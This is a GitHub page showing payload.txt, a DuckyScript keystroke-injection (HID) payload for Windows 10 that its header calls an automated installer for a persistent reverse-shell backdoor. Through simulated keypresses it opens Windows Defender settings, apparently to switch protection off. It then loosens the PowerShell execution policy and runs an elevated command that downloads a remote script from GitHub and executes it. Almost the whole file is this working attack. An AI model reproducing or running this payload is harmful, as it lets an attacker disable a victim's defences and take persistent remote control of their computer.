-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpayload.txt
47 lines (45 loc) · 926 Bytes
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
REM Title: Excution PermanentRevershell
REM Description Execution atomated of PermanentRevershell: A potent Windows 10 backdoor providing persistent access and full system control.
REM Author: Alariordas
REM Props: Aurora's devs
REM Version: 1.0
REM Target: Windows 10
REM Attackmodes: HID
GUI R
STRING ms-settings:windowsdefender
DELAY 300
ENTER
DELAY 1000
TAB
ENTER
DELAY 200
TAB
TAB
TAB
TAB
ENTER
DELAY 200
SPACE
DELAY 200
LEFT
ENTER
DELAY 200
ALT F4
DELAY 200
GUI R
DELAY 300
STRING powershell -nop -ep bypass -c IEX(IWR Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force -UseBasicParsing);
DELAY 100
CTRL SHIFT ENTER
DELAY 300
LEFT
ENTER
DELAY 200
GUI R
DELAY 300
STRING powershell.exe IEX(IWR https://raw.githubusercontent.com/alariordas/PersistentReverseShell-Win10Backdoor/main/ncinstallerdebug.ps1 -UseBasicParsing);
DELAY 100
CTRL SHIFT ENTER
DELAY 300
LEFT
ENTER